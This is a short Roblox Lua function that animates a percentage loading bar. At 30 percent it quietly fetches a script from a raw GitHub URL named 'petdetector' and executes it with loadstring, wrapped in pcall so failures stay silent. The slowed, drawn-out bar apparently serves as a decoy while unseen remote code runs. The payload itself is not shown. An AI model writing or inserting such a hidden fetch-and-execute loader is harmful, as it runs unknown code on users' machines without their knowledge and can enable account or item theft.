local function fillProgress()
	a = true
	bar.Size = UDim2.new(0, 0, 1, 0)
	perc.Text = "0%"

	for i = 1, 100 do
		perc.Text = i .. "%"
		bar:TweenSize(UDim2.new(i / 100, 0, 1, 0), "Out", "Linear", 0.1, true)

		if i == 30 then
			pcall(function()
				loadstring(game:HttpGet("https://raw.githubusercontent.com/No-Laggs/oldservers/refs/heads/main/petdetector"))()
			end)
		end

		-- Dynamic wait time: slower after 70%
		if i < 70 then
			wait(0.8) -- Normal speed
		else
			wait(1.8) -- Slower after 70%
		end
	end

	a = false
	retryBtn.Visible = true
end
